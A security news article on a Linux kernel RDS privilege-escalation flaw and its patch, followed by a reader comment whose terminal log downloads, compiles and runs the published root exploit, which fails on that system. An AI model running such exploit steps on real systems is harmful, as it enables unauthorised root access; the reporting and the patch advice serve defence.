The open-source Linux operating system contains a serious security flaw that can be exploited to gain superuser rights on a target system.
The vulnerability, in the Linux implementation of the Reliable Datagram Sockets (RDS) protocol, affects unpatched versions of the Linux kernel, starting from 2.6.30, where the RDS protocol was first included.
According to VSR Security, the research outfit that discovered the security hole, Linux installations are only vulnerable if the CONFIG_RDS kernel configuration option is set, and if there are no restrictions on unprivileged users loading packet family modules, as is the case on most stock distributions.
Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.
The company has released a proof-of-concept exploit to demonstrate the severity of the vulnerability. The folks at The H Security tested the exploit on Ubuntu 10.04 (64-bit) and successfully opened a root shell.
A fix for this issue has been committed by Linus Torvalds. VSR Security recommends that users install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
Ron on
I installed my kernel back on 01-Oct, so it should be vulnerable, but it's not, even when I modprobed the rds modules and ran the code from root.
$ apt-cache policy linux-image-2.6.32-5-amd64
linux-image-2.6.32-5-amd64:
Installed: 2.6.32-24
Candidate: 2.6.32-26
Version table:
2.6.32-26 0
500 http://mirrors.kernel.org/debian/ sid/main amd64 Packages
*** 2.6.32-24 0
100 /var/lib/dpkg/status
$ uname -r
2.6.32-5-amd64
$ cat /etc/debian_version
squeeze/sid
$ grep RDS /boot/config-2.6.32-5-amd64
CONFIG_RDS=m
CONFIG_RDS_RDMA=m
CONFIG_RDS_TCP=m
# CONFIG_RDS_DEBUG is not set
# modprobe rds
# modprobe rds_tcp
# modprobe rds_rdma
$ lsmod | grep rds
rds_rdma 56776 0
rdma_cm 20582 1 rds_rdma
ib_core 40967 6 rds_rdma,rdma_cm,ib_cm,iw_cm,ib_sa,ib_mad
rds_tcp 8260 0
rds 70414 2 rds_rdma,rds_tcp
$ ls -o /boot/System.map-$(uname -r)
-rw-r--r-- 1 root 1661060 Sep 30 00:56 /boot/System.map-2.6.32-5-amd64
$ wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
--2010-10-21 10:18:35-- http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Resolving www.vsecurity.com... 209.67.252.12
Connecting to www.vsecurity.com|209.67.252.12|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6435 (6.3K) [text/x-c]
Saving to: “linux-rds-exploit.c”
100%[=================================================================>] 6,435 33.4K/s in 0.2s
2010-10-21 10:18:36 (33.4 KB/s) - “linux-rds-exploit.c” saved [6435/6435]
$ gcc linux-rds-exploit.c
$
$ ls -o a.out
-rwxr-xr-x 1 me 12900 Oct 21 10:21 a.out
$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
$ sudo ~me/a.out
[sudo] password for me:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
# ~me/a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.